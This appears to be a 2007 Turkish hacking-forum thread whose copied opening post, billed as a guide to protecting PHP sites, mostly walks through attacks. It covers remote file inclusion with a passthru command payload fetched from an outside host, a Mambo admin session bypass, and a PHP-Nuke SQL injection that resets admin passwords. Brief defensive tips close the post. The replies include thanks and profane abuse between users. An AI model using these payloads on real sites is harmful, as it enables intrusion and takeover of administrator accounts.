PortalliPortalli  ForumForum  AnasayfaAnasayfa  TakvimTakvim  SSSSSS  AramaArama  Kayıt OlKayıt Ol  Üye ListesiÜye Listesi  Kullanıcı GruplarıKullanıcı Grupları  YöneticilerYöneticiler  Giriş yap  

Paylaş | 
 

 php açıklarından korunma yolları..

Aşağa gitmek 
YazarMesaj
Misafir
Misafir
avatar


MesajKonu: php açıklarından korunma yolları..   Çarş. Ağus. 15, 2007 3:21 pm

PHP şuanda dünyada en çok kullanılan web programlama dillerinden biri.Her geçen gün yeni php scriptler yazılıyor programcılar sürekli kendini geliştirmeye çalışıyor ve web siteleri daha fazla php ile içiçe girmeye başlıyor.Bu yazıda PHP kodları yazılırken gözden kaçan şeylerden nasıl bir web sitesine istediğimiz yapabileceğimizi ve bunlardan nasıl korunacağımızı anlatacağım.Başlayalım;

Fonksiyonları Kullanma:
PHP fonksiyonlarının bir çoğu esnek ve bir okadar erişime açıktır.Mesela include(), require() ve fopen() fonsiyonları yerel host üzerindeki dosyaları kabul eder.Bunlarda yapılan yanlış yapılandırma gibi hataları kullanarak uzaktan neler yapabileceğimizi görelim;

http://example.com/page.php?i=x.html

diye bir sayfamız olsun burada $i açıkça dosyayı içerdiğini görüyoruz peki böyle bir sayfa gördüğümüzde ilk olarak ne düşünürüz

-programcı i=../../../etc/passwd? gibi bir yol yapmışmıdır
-.html uzantısını kontrol etmişmidir
-fopen() fonskiyonunu kullanmışmıdır
-uzaktan yapılan istekleri engellemişmidir

eğer hepsi bizim işimize göre negatifse şöyle birşey yapabiliriz

http://example.com/page.php?i=http://e-hack.org/x.html

burada x sayfasının içine şu tip kodları koyarak dahada olayı geliştirebiliriz

<?php
passthru ('id');
passthru ('ls -al /etc');
passthru ('ping -c 1 e-hack.org');
passthru ('echo Admin el salla | mail root');
?>

ve bu size bağlı olarak geliştirilebilir.Sanırım burada yapılacaklar sınırsız.

Genel Açıklar:
Her PHP programcısı mutlaka gözden birşeyleri kaçırır çünkü PHP çok geniş ve mükemmel kodlanması neredeyse imkansız çünkü mükemmel kodlansa bile PHP den doğan yeni açıklar bulunarak mükemmellik kırılabilinir.Burada Environment, GET, POST, Cookie ve Server değişkenlerini Genel Açıklar içine dahil edebiliriz.

Mesela eski bir mambo sürümdeki genel açığı inceliyelim;
Bu sürümde admin/ klasörünün altındaki index.php form yollandıktan sonra şifreyi database deki ile karşılaştırıyor.

<?php
if ($dbpass == $pass) {
session_register("myname" );
session_register("fullname" );
session_register("userid" );
header("Location: index2.php" );
}
?>

eğer şifre doğruysa $myname, $fullname ve $userid kaydedilir ve kullanıcı index2.php ye gönderilir.

<?php
if (!$PHPSESSID) {
header("Location: index.php" );
exit(0);
} else {
session_start();
if (!$myname) session_register("myname" );
if (!$fullname) session_register("fullname" );
if (!$userid) session_register("userid" );
}
?>

burada eğer session ID ayarlanmamışsa kullanıcı tekrar login ekranına geri gönderilir fakat ayarlanmışsa script işleme devam eder ve bir önceki ayarlarla kullanıcı giriş yapar.Şimdi biz bunu nasıl sömüreceğiz bunu inceliyelim;

http://example.ch/admin/index2.php?P...u serid=admin

gibi bir URL miz olduğunu düşünün.Burada $PHPSESID değişkeni ayarlı ve bu değişkende diğer 3 değişkenin doğrulanmasını sağlıyor.Ve burada yapılan sorgu işleminin yanlışlığından istediğimiz gibi giriş yapmamıza olanak veriyor.

SQL yapılandırma hataları:
SQL süz bir php düşünemeyiz.Fakat kontrol edilmemiş SQL sorgu değişkenleri çok büyük tehlikeleri birlikte getirmekte şöyleki;

Gene eski bir PHP-Nuke script versiyonunu inceliyelim.Bu versiyonda yapımcılar tüm tabloların başına "nuke" önekini koymuşlar sanıyorum bunu diğer scriptlerden farklı olduklarını göstermek için yapmışlar.Buradaki her $prefix = "nuke"; tanımlaması config.php içinde yapılır.

Şimdi article.php yi inceliyelim;
<?php
if (!isset($mainfile)) {
include("mainfile.php" );
}
if (!isset($sid) && !isset($tid)) {
exit();
}
?>

ve biraz aşağıda SQL sorgusu

<?php
mysql_query("UPDATE $prefix"._stories.
" SET counter=counter+1 where sid=$sid" );
?>

SQL sorgusunu değiştirmek için $prefix in ana değerinde olmamalı bu sayede biz herhangi bir değer vererek GET parametrelerini kullanabileceğiz.config.php mainfile.php yi içermekte biz biliyoruzki $mainfile, $sid ve $tid herhangi bir değişken atıyarak GET parametrelerini kullanabiliriz.Bunu yapınca script mainfile.php ve $prefix içerdiğini ve buna göre ayarlandığını düşünecektir (!).

http://example.com/article.php?mainf...set%20pwd=1%23

bunun açılımı

UPDATE nuke.nuke_authors set pwd=1#_stories
SET er=counter+1 where sid=$sid" );

şeklinde olacaktır yani bir sonraki sorguda tüm admin şifreleri "1" olarak ayarlandı.

Güvenlik:

-İlk olarak dışardan yapılacak müdahalelere karşı dikkatli olmalısınız.Biri sizin scriptinizdeki cookie denetimlerini veya herhangi java script uygulamalarıyla yaptığınız kodlamaları kullanabilir.
-Tüm dış değişkenler doğrulanmalıdır.Mesela bir database tablosunu es geçerseniz bir sonraki satırdaki GET parametrelerinde hile yapılmasına olanak sağlarsınız.
-Hata kayıtlarında dikkatli olmalısınız.En iyi yöntem olarak error_log() fonksiyonunu kullanabilirsiniz.Eğer biri sizin scriptinizle oynamaya başladığında bu şekilde bu kayıtları bir yerde toplayabilir veya kendinize mail olarak gönderebilirsiniz.

alıntıdır...


En son tarafından Çarş. Ağus. 15, 2007 3:43 pm tarihinde değiştirildi, toplamda 1 kere değiştirildi
Sayfa başına dön Aşağa gitmek
Hacker Namzeti
HTT Üyesi
HTT Üyesi
avatar

Erkek
Mesaj Sayısı : 334
Şehir : www.hackturkiye.ile.biz
Meslek : Hack|Hack
Kayıt tarihi : 30/07/07

MesajKonu: Geri: php açıklarından korunma yolları..   Çarş. Ağus. 15, 2007 3:22 pm

Sağolasın zargana . Güzel paylaşımlara imza atıyorsun...

_________________


Ne Bizi Sevecek Bir Kız Bulabildik;
Ne De Onların Sevebilecekleri Kadar Basit Olabildik.

BENİM DUYGULARIM YOĞUN BE GÜZELİM!!!
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://hackturkiye.buygoo.net/
Gkhan26
HTT Üyesi
HTT Üyesi
avatar

Mesaj Sayısı : 146
Yaş : 25
Şehir : Eskişehir
Meslek : Hacker !
Kayıt tarihi : 13/08/07

MesajKonu: Geri: php açıklarından korunma yolları..   Çarş. Ağus. 15, 2007 4:09 pm

Saol Güzel Paylaşım
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
azrail
Banned
Banned


Mesaj Sayısı : 24
Kayıt tarihi : 15/08/07

MesajKonu: Geri: php açıklarından korunma yolları..   Çarş. Ağus. 15, 2007 6:32 pm

BEN BİR OROSPU COCUGUYUM ANAMI HASALİ SİKMİŞTİR.
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
Misafir
Misafir
avatar


MesajKonu: Geri: php açıklarından korunma yolları..   Çarş. Ağus. 15, 2007 6:36 pm

lan dua et sitede küfr yasak....yarın bu sitede ol....
Sayfa başına dön Aşağa gitmek
AngeLiCA
Banned
Banned


Mesaj Sayısı : 32
Yaş : 25
Kayıt tarihi : 15/08/07

MesajKonu: Geri: php açıklarından korunma yolları..   Çarş. Ağus. 15, 2007 6:38 pm

HASALİ ABİME YANLIŞ YAPTIGIM ICIN SIKILDIM
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
azrail
Banned
Banned


Mesaj Sayısı : 24
Kayıt tarihi : 15/08/07

MesajKonu: Geri: php açıklarından korunma yolları..   Çarş. Ağus. 15, 2007 6:39 pm

HASALİ ABİME YANLIŞ YAPTIGIM ICIN SIKILDIM
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
AngeLiCA
Banned
Banned


Mesaj Sayısı : 32
Yaş : 25
Kayıt tarihi : 15/08/07

MesajKonu: Geri: php açıklarından korunma yolları..   Çarş. Ağus. 15, 2007 6:41 pm

bakkl hackliii yapıo bunlarrr
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
Misafir
Misafir
avatar


MesajKonu: Geri: php açıklarından korunma yolları..   Çarş. Ağus. 15, 2007 6:43 pm

yarın sen gel siteye o zamn bakkal hackını göstririm sana...
Sayfa başına dön Aşağa gitmek
AngeLiCA
Banned
Banned


Mesaj Sayısı : 32
Yaş : 25
Kayıt tarihi : 15/08/07

MesajKonu: Geri: php açıklarından korunma yolları..   Çarş. Ağus. 15, 2007 6:45 pm

BEN BİR OROSPU COCUGUYUM ANAMI HASALİ SİKMİŞTİR.
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
Misafir
Misafir
avatar


MesajKonu: Geri: php açıklarından korunma yolları..   Çarş. Ağus. 15, 2007 6:57 pm

yarın görüşürüz....!!!!!
Sayfa başına dön Aşağa gitmek
H@CKER
HTT Üyesi
HTT Üyesi
avatar

Erkek
Mesaj Sayısı : 468
Şehir : www.hackturkiye.ile.biz
Meslek : H@CKER\'LİK
Kayıt tarihi : 12/08/07

MesajKonu: Geri: php açıklarından korunma yolları..   Perş. Ağus. 16, 2007 9:36 am

küfür yasak böyle gidersen çook siklirsin konu klit
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
 
php açıklarından korunma yolları..
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» İNTERNET HIZINI YÜKSELTME!!!!(Programsız)
» HANGİ HASTALIĞA HANGİ YİYECEK 2
» Diyarbakır Ünlüleri
» Beynimizi tehdit eden hastalıklar
» Sistem Açıkları ve Kapatmak

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 ::  :: WEB Security-
Buraya geçin: